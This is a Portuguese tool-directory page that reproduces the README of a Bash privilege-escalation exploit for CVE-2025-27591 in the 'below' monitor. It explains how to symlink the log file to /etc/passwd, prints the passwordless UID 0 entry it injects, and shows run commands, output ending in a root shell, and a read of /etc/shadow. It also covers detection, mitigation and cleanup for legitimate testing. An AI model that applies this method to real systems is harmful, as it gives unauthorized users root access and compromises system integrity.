Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Um exploit de escalonamento de privilégios baseado em Bash que tem como alvo a ferramenta de monitoramento de desempenho do sistema `below`. Este exploit reformulado aproveita uma vulnerabilidade de symlink no mecanismo de registro para injetar um usuário root em `/etc/passwd`, alcançando acesso root total. | Kitploit
Ferramentas/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Um exploit de escalonamento de privilégios baseado em Bash que tem como alvo a ferramenta de monitoramento de desempenho do sistema `below`. Este exploit reformulado aproveita uma vulnerabilidade de symlink no mecanismo de registro para injetar um usuário root em `/etc/passwd`, alcançando acesso root total.

Ver Repositório
21há 10 mesesAinda não revisado
Compartilhar

Buy me a knowledge

CVE-2025-27591 Exploit - Ataque de Link Simbólico no Below Logger

Um exploit de escalonamento de privilégios baseado em Bash direcionado à ferramenta de monitoramento de desempenho do sistema below. Este exploit reformulado aproveita uma vulnerabilidade de link simbólico no mecanismo de registro para injetar um usuário root no /etc/passwd, obtendo acesso root completo.

Créditos

Descoberto e reportado por Matthias Gerstner @ SUSE - Aviso de Segurança

Detalhes da Vulnerabilidade

  • CVE: CVE-2025-27591
  • Componente Afetado: /usr/bin/below (monitor de desempenho do sistema do Facebook)
  • Versões Afetadas: versões do below com diretórios de log graváveis por qualquer usuário
  • Tipo de Vulnerabilidade: Ataque de Link Simbólico / Escalonamento de Privilégio
  • Vetor de Ataque: /var/log/below/error_root.log → /etc/passwd
  • Pontuação CVSS: Alta (Escalonamento de Privilégio para Root)

Visão Geral

A ferramenta de monitoramento below registra erros em /var/log/below/error_root.log quando executada com privilégios elevados. Se o diretório de log for gravável por qualquer usuário, um atacante pode:

  1. Criar um link simbólico de error_root.log para /etc/passwd
  2. Acionar o comando below record para escrever mensagens de erro no link simbólico
  3. Injetar manualmente uma entrada de usuário maliciosa com UID=0 (privilégios de root)
  4. Abrir um shell root usando o usuário recém-criado

Este exploit automatiza todo o processo com mecanismos de fallback inteligentes para lidar com várias configurações de sistema.

Diagrama de Fluxo do Exploit

root@kitploit:~
flowchart TD
    A[Iniciar Exploit] --> B[Obter Nome de Usuário do Usuário]
    B --> C{Verificar /var/log/below<br/>Gravável por Todos?}
    C -->|Não| D[Sair: Não Vulnerável]
    C -->|Sim| E[Remover error_root.log existente]
    E --> F[Criar Link Simbólico:<br/>error_root.log → /etc/passwd]
    F --> G{Link Simbólico Criado<br/>com Sucesso?}
    G -->|Não| D
    G -->|Sim| H[Executar: sudo below record]
    H --> I[Aguardar 3 segundos para registro]
    I --> J[Matar processo below]
    J --> K{Payload em<br/>/etc/passwd?}
    K -->|Sim| M[Caminho de Sucesso]
    K -->|Não| L[Tentar Injeção Manual:<br/>echo payload >> link simbólico]
    L --> N{Injeção Manual<br/>com Sucesso?}
    N -->|Não| O[Tentar Fallback:<br/>sudo tee -a]
    N -->|Sim| M
    O --> P{Fallback<br/>com Sucesso?}
    P -->|Não| D
    P -->|Sim| M
    M --> Q[Verificar Payload em /etc/passwd]
    Q --> R[Desabilitar Trap de Limpeza]
    R --> S[Executar: su username]
    S --> T[Shell Root Obtido]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Detalhes Técnicos

Etapas de Exploração

  1. Fase de Pré-Verificação

    • Verificar se o diretório /var/log/below existe
    • Verificar se o diretório tem permissões de gravação para todos (o+w)
    • Testar a capacidade de criação de link simbólico
  2. Fase de Configuração

    • Remover qualquer arquivo error_root.log existente
    • Criar link simbólico: /var/log/below/error_root.log → /etc/passwd
    • Verificar se o link simbólico aponta para o alvo correto
  3. Fase de Injeção (Método Principal)

    • Executar sudo below record em segundo plano
    • Permitir que o processo execute por 3 segundos para acionar o registro de erros
    • Matar o processo para evitar registro contínuo
    • Verificar se as mensagens de erro corromperam o /etc/passwd de forma útil
  4. Fase de Injeção (Métodos de Fallback)

    • Método 1: Anexação direta via link simbólico (echo >> link simbólico)
    • Método 2: Usar sudo com tee (sudo tee -a)
  5. Fase de Abertura de Shell

Estrutura do Payload

A entrada injetada no /etc/passwd segue este formato:

root@kitploit:~
username::0:0:username:/root:/bin/bash

Detalhamento dos Campos:

  • username: Nome de usuário fornecido (padrão: "0xdtc")
  • ::: Campo de senha vazio (nenhuma senha necessária)
  • 0:0: UID=0, GID=0 (privilégios de root)
  • username: Campo GECOS (descrição do usuário)
  • /root: Diretório home
  • /bin/bash: Shell de login

Pré-requisitos

  • Sistema alvo executando um binário below vulnerável
  • Diretório /var/log/below deve ser gravável por todos os usuários
  • O usuário deve ter acesso sudo para executar below record
  • Ambiente de shell Bash

Uso

Execução Básica

root@kitploit:~
# Tornar o script executável
chmod +x CVE-2025-27591

# Executar o exploit
./CVE-2025-27591

Prompts Interativos

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] Este exploit criará um novo usuário root no /etc/passwd
[?] Insira o nome de usuário para o novo usuário root (padrão: 0xdtc): meuusuario
[+] Usando nome de usuário: meuusuario

Exemplo de Saída

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] Este exploit criará um novo usuário root no /etc/passwd
[?] Insira o nome de usuário para o novo usuário root (padrão: 0xdtc): 0xdtc
[+] Usando nome de usuário: 0xdtc

[*] Verificando vulnerabilidade CVE-2025-27591
[+] /var/log/below é gravável por todos
[*] Testando criação de link simbólico
[+] Teste de link simbólico bem-sucedido
[+] Alvo está vulnerável

[*] Iniciando exploração
[+] Payload escrito em /tmp/exploit_payload
[*] Criando link simbólico: /var/log/below/error_root.log -> /etc/passwd
[+] Link simbólico criado
[*] Executando 'sudo below record' para acionar registro
[*] Iniciado 'below record' com PID: 12345
[*] Verificando se o payload foi escrito
[*] Tentando injeção manual
[*] Anexando payload ao /etc/passwd via link simbólico
[+] Payload anexado
[+] Exploração concluída! Payload está em /etc/passwd
[*] Abrindo shell root via 'su 0xdtc'
[*] A senha deve estar vazia, apenas pressione Enter

root@kali:/tmp# whoami
root

Recursos

Tratamento Inteligente de Bloqueios

O script inclui múltiplos mecanismos de fallback para lidar com várias configurações de sistema:

  1. Tratamento de Arquivos Existentes

    • Detecta e remove automaticamente arquivos de log existentes
    • Lida com arquivos regulares e links simbólicos existentes
    • Valida o alvo do link simbólico antes de prosseguir
  2. Múltiplos Métodos de Injeção

    • Principal: Acionar via registro de erro do below record
    • Fallback 1: Anexação direta ao link simbólico
    • Fallback 2: Escrita privilegiada usando sudo tee
  3. Gerenciamento de Processos

    • Mata automaticamente processos below pendentes
    • Previne exaustão de recursos
    • Lida com limpeza de processos em caso de falha
  4. Detecção de Re-execução

    • Verifica se o payload já existe no /etc/passwd
    • Pula a exploração se o usuário já foi criado
    • Abre shell diretamente na re-execução

Recursos de Qualidade de Código

  • Comentários Abrangentes: Todas as funções e etapas críticas documentadas
  • Cabeçalhos de Seção: Código organizado em seções lógicas
  • Tratamento de Erros: Verificação adequada de erros e feedback ao usuário
  • Saída Limpa: Handlers de trap para limpeza graciosa em caso de falha
  • Dependências Mínimas: Bash puro com ferramentas Unix padrão

Estrutura de Arquivos

root@kitploit:~
.
├── CVE-2025-27591           # Script principal de exploração
├── README.md           # Esta documentação
└── /tmp/exploit_payload # Arquivo de payload temporário (criado em tempo de execução)

Verificação

Após exploração bem-sucedida, verifique o acesso root:

root@kitploit:~
# Verificar usuário atual
root@target:/tmp# whoami
root

# Verificar ID do usuário e grupos
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Verificar usuário em /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Ler arquivos exclusivos do root
root@target:/tmp# cat /etc/shadow
[... conteúdo do shadow ...]

Limpeza

Se você precisar remover o usuário malicioso após os testes:

root@kitploit:~
# Remover o usuário injetado do /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd

# Remover quaisquer links simbólicos restantes
rm -f /var/log/below/error_root.log

Substitua username pelo nome de usuário real que você usou durante a exploração.

Detecção e Mitigação

Métodos de Detecção

  1. Monitoramento de Integridade de Arquivos

    root@kitploit:~
    # Monitorar /etc/passwd quanto a alterações não autorizadas
    aide --check
    
  2. Detecção de Links Simbólicos

    root@kitploit:~
    # Verificar links simbólicos suspeitos em diretórios de log
    find /var/log -type l -ls
    
  3. Logs de Auditoria

    root@kitploit:~
    # Verificar uso suspeito de sudo
    grep "below record" /var/log/auth.log
    

Estratégias de Mitigação

  1. Corrigir Permissões de Diretório

    root@kitploit:~
    # Remover permissão de gravação para todos do diretório de log
    sudo chmod 755 /var/log/below
    
  2. Políticas AppArmor/SELinux

    • Implementar controles de acesso obrigatórios
    • Restringir locais de escrita de arquivos do binário below
  3. Atualizar o Below

    • Aplicar patches de segurança do Facebook/Meta
    • Usar atualizações do gerenciador de pacotes
  4. Monitorar /etc/passwd

    • Configurar monitoramento de integridade de arquivos (AIDE, Tripwire)
    • Alertar sobre adições de usuários com UID=0

Aviso Legal

Este exploit é destinado apenas para fins educacionais e testes de penetração autorizados.

O acesso não autorizado a sistemas computacionais é ilegal. Use esta ferramenta apenas em sistemas onde você tenha permissão explícita para realizar testes de segurança. O(s) autor(es) não assume(m) responsabilidade pelo uso indevido desta ferramenta.

Ao usar este exploit, você reconhece que:

  • Possui autorização adequada para testar o sistema alvo
  • Compreende as leis e regulamentos aplicáveis
  • Aceita total responsabilidade por suas ações

Repositório: https://github.com/0xDTC/ Autor: Divine Clown (0xDTC) Licença: Apenas para Uso Educacional Última Atualização: 2025-11-13

Baixar ferramenta
  • Verificar se o usuário malicioso existe no /etc/passwd
  • Desabilitar traps de limpeza para evitar remoção
  • Executar su <username> para obter shell root